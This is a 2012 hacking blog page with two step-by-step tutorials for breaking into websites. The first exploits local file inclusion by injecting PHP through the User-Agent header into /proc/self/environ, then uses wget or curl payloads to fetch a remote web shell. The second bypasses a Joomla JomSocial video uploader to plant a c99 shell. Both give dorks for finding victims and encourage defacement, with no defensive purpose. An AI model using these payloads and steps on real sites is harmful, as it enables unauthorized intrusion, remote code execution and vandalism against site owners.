Thursday, August 30, 2012

LFI and Shell Upload with Tamper Data


Hello Friends, today I'm Publishing a tutorial on what is LFI , and how to Upload Shell with Tamper Data in LFI and vulnrable website

LFI means Local File Inclusion, its gives you access to read files on a website/server via your  browser.
previously i Published a Post on LFI, you can read it here 






LFI  vulnerable website URL looks  like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code looks like that makes it vulnerable.

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
  include("pages/$file");
   }
   else
   {
  include("index.php");
   }
   ?>
Few Things You Need for this Method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now i'm showing  how to exploit LFI and upload your shell via /proc/self/environ using Tamper data


So after selecting a vulnrable website, check /etc/passwd.
Your page should come up with something that looks like this.



 image_2317891.original.jpg (620×511)
 Full size Image : click here
Great !!, now you are sure  that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look  like this if the file exists,
Note - not all websites have it.
image_2317892.original.jpg (620×383) 


Full size image : Click here

i'm interested in,  HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.


To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.

 image_2317897.original.jpg (264×306)


Now you will got a  window looks like this.
image_2317896.original.jpg (478×620) 



your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.


 i'll try some code injection.
After start tampering, you should see a window  looks  like this


image_2317893.original.jpg (620×260) 
Full size image : Click Here



In the User-Agent field, type this 


<?php phpinfo();?>


Now vulnrable website is down loading, 
you will see something like this if you did it correctly
image_2317894.original.jpg (620×453) 
Full size Image : click here

Now we can execute code, so let's upload upload your shell 


Open TamperData again, click start tamper, and refresh  website. and This time in the User-Agent enter this


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this
image_2317898.original.jpg (620×262) 
Full size image : Click here

it downloads  text file, and renames it as a php file 
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


when you're done with that, you can access your shell directly by going to http://site/shell.php


If you getting an error, try using the same method as when you got your 
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done, you have a  shell, like this <3
image_2317895.original.jpg (620×334) 
Full size Image : Click Here

Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
 your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curlhttp://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
Read more ...>>

Wednesday, August 29, 2012

JomSocial ~ Joomla Shell Upload Vulnerability


Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site

& a Brain :)

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:

1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Read more ...>>

 

Sponsor

To Top Page Up Page Down To Bottom Auto Scroll Stop Scroll